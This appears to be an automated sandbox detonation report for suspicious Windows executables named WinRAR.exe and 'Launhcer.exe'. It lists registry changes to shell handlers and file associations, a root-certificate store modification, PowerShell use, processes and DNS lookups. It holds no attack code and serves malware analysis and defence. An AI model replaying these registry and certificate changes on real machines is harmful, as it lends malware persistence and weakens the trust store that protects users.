memory/3780-199-0x00000234FB780000-0x00000234FB79C000-memory.dmp
memory/3780-200-0x00000234FB770000-0x00000234FB77A000-memory.dmp
memory/3780-201-0x00000234FBB00000-0x00000234FBB08000-memory.dmp
memory/3780-202-0x00000234FBB10000-0x00000234FBB1A000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:13
Platform
win10v2004-20240508-en
Max time kernel
87s
Max time network
156s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3628 -ip 3628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 3112
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win10v2004-20240508-en
Max time kernel
34s
Max time network
39s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
